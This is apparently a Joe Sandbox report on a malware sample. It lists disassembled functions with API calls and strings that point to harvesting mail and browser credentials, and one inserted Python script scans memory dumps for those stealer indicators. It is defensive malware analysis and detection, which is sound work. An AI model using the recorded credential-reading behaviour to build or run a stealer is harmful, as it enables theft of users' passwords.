                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                        • String ID: caption$dialog_%d
                                        • API String ID: 2923679083-4161923789
                                        • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                        • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                        • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                        • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                        APIs
                                        • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                        Strings
                                        • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                        • unknown error, xrefs: 004277B2
                                        • abort due to ROLLBACK, xrefs: 00428781
                                        • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                        • no such savepoint: %s, xrefs: 00426A02
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                        • API String ID: 3510742995-3035234601
                                        • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                        • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                        • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                        • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                        • API String ID: 2221118986-3608744896
                                        • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                        • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                        • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                        • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                        APIs
                                        • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                          • Part of subcall function 0044257F: memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcmpmemcpy
                                        • String ID: BINARY$NOCASE$RTRIM$main$temp
                                        • API String ID: 1784268899-4153596280
                                        • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                        • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                        • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                        • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                        APIs
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                        • memset.MSVCRT ref: 00410246
                                        • memset.MSVCRT ref: 00410258
                                          • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                        • memset.MSVCRT ref: 0041033F
                                        • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                        • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                        • String ID:
                                        • API String ID: 3974772901-0
                                        • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                        • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                        • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                        • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                        APIs
                                        • wcslen.MSVCRT ref: 0044406C
                                        • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                          • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                        • strlen.MSVCRT ref: 004440D1
                                          • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                          • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                        • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                        • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                        • String ID:
                                        • API String ID: 577244452-0
                                        • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                        • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                        • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                        • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                        APIs
                                          • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                          • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                        • _strcmpi.MSVCRT ref: 00404518
                                        • _strcmpi.MSVCRT ref: 00404536
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _strcmpi$memcpystrlen
                                        • String ID: imap$pop3$smtp
                                        • API String ID: 2025310588-821077329
                                        • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                        • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                        • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                        • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                        APIs
                                        • memset.MSVCRT ref: 0040C02D
                                          • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                          • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75570A60), ref: 00408EBE
                                          • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408E31
                                          • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                          • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                          • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                          • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                          • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                          • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                          • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                          • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                        • API String ID: 2726666094-3614832568
                                        • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                        • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                        • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                        • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                        APIs
                                        • memset.MSVCRT ref: 00403A88
                                        • memset.MSVCRT ref: 00403AA1
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                        • strlen.MSVCRT ref: 00403AE9
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWidememset$FileWritestrlen
                                        • String ID:
                                        • API String ID: 1786725549-0
                                        • Opcode ID: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
                                        • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                        • Opcode Fuzzy Hash: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
                                        • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                        APIs
                                        • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                        • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                        • OpenClipboard.USER32(?), ref: 0040C1B1
                                        • GetLastError.KERNEL32 ref: 0040C1CA
                                        • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                        • String ID:
                                        • API String ID: 2014771361-0
                                        • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                        • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                        • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                        • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                        APIs
                                        • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                          • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                          • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                          • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                        • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                        • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                        • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcmp$memcpy
                                        • String ID: global-salt$password-check
                                        • API String ID: 231171946-3927197501
                                        • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                        • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                        • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                        • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
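The string IDs recorded for the dumped region at 00400000 across the preceding function entries (the SQLite error text and collation names "NOCASE"/"RTRIM", the "imap"/"pop3"/"smtp" protocol names, the "*.csv"/"*.htm;*.html"/"*.txt"/"*.xml" export filters, and the key3.db entry names "global-salt"/"password-check" in the entry just above) are usable as triage indicators on their own. The following script is an added example, not code from the Joe Sandbox report or from the sample; it sweeps a memory region for exactly those literals in both ASCII and UTF-16LE form and maps the hits to the credential-recovery capabilities the report attributes to the sample. The group labels, the two-string threshold for SQLite, and the sample buffer are this example's own assumptions; a real run would read the linked .sdmp file instead of the constructed buffer. The generic SQLite schema names "main" and "temp" are deliberately left out because they match almost any binary.

```python
"""
Indicator sweep over a dumped memory region (added example, not part of the
Joe Sandbox report). Looks for the literal strings the report's "String ID"
fields record for the region at 0x400000 and groups hits by capability.
"""
import re

# Literals copied from the report's String ID fields. Group names and the
# grouping itself are this example's choice, not the report's.
INDICATORS = {
    "embedded_sqlite": [
        b"a GROUP BY clause is required before HAVING",
        b"aggregate functions are not allowed in the GROUP BY clause",
        b"NOCASE",
        b"RTRIM",
    ],
    "mail_client_protocols": [b"imap", b"pop3", b"smtp"],
    "mozilla_key_db": [b"global-salt", b"password-check"],
    "report_export_filters": [b"*.csv", b"*.htm;*.html", b"*.txt", b"*.xml"],
}


def _ascii_pattern(token: bytes) -> re.Pattern:
    # Short tokens (imap, smtp, *.txt, ...) get word boundaries so that they are
    # not counted inside unrelated longer strings such as "imapsync".
    esc = re.escape(token)
    if len(token) <= 5:
        esc = rb"(?<![A-Za-z0-9])" + esc + rb"(?![A-Za-z0-9])"
    return re.compile(esc)


def scan_region(blob: bytes) -> dict[str, dict[str, int]]:
    """Return {group: {indicator: first_offset}} for every indicator present.

    Each literal is tried as ASCII first and then as UTF-16LE, since the same
    tool strings may be stored either way inside a PE image.
    """
    hits: dict[str, dict[str, int]] = {}
    for group, tokens in INDICATORS.items():
        for tok in tokens:
            m = _ascii_pattern(tok).search(blob)
            if m is not None:
                off = m.start()
            else:
                off = blob.find(tok.decode("ascii").encode("utf-16-le"))
            if off >= 0:
                hits.setdefault(group, {})[tok.decode("ascii")] = off
    return hits


def capabilities(hits: dict[str, dict[str, int]]) -> list[str]:
    """Translate indicator groups into the capabilities they point to.

    A single SQLite string is weak evidence on its own (many benign programs
    embed SQLite), so two distinct strings are required for that group; the
    threshold is this example's assumption.
    """
    caps = []
    if len(hits.get("embedded_sqlite", {})) >= 2:
        caps.append("embedded SQLite engine (reads browser login/history databases)")
    if "mozilla_key_db" in hits:
        caps.append("Mozilla key3.db parsing (global-salt / password-check entries)")
    if "mail_client_protocols" in hits:
        caps.append("mail account / protocol enumeration (imap, pop3, smtp)")
    if "report_export_filters" in hits:
        caps.append("password-recovery-tool export filters (csv/html/txt/xml)")
    return caps


# Constructed stand-in for the dumped region; not data from the report.
# Note the UTF-16LE "*.csv" and the "imapsync" decoy that must not count as "imap".
SAMPLE_REGION = (
    b"\x00" * 16
    + b"a GROUP BY clause is required before HAVING\x00"
    + b"BINARY\x00NOCASE\x00RTRIM\x00main\x00temp\x00"
    + b"pop3\x00smtp\x00imapsync\x00"
    + b"global-salt\x00password-check\x00"
    + "*.csv".encode("utf-16-le") + b"\x00\x00"
    + b"\x00" * 16
)


if __name__ == "__main__":
    # Replace SAMPLE_REGION with open("<dump>.sdmp", "rb").read() for a real sweep.
    found = scan_region(SAMPLE_REGION)
    for group, entries in found.items():
        for name, off in sorted(entries.items(), key=lambda kv: kv[1]):
            print(f"{group:24s} {name!r} @ 0x{off:06x}")
    for cap in capabilities(found):
        print("->", cap)
```

The offsets it reports are relative to the start of the region, so add the region's base (00400000 in this report) to get the virtual address to look up in the disassembly.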
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                        • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                        • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                        • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 004016A3
                                        • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                        • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                        • BeginPaint.USER32(?,?), ref: 004016D7
                                        • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                        • EndPaint.USER32(?,?), ref: 004016F3
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                        • String ID:
                                        • API String ID: 19018683-0
                                        • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                        • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                        • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                        • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                        APIs
                                        • memset.MSVCRT ref: 0040644F
                                        • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                        • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                          • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                          • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                          • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                          • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                          • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                        • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                        • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                        • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                        • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                          • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memset
                                        • String ID:
                                        • API String ID: 438689982-0
                                        • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                        • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                        • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                        • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                        APIs
                                        • memset.MSVCRT ref: 0044495F
                                        • memset.MSVCRT ref: 00444978
                                        • memset.MSVCRT ref: 0044498C
                                          • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                        • strlen.MSVCRT ref: 004449A8
                                        • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                        • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                          • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                        • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpymemset$strlen
                                        • String ID:
                                        • API String ID: 2142929671-0
                                        • Opcode ID: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                        • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                        • Opcode Fuzzy Hash: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
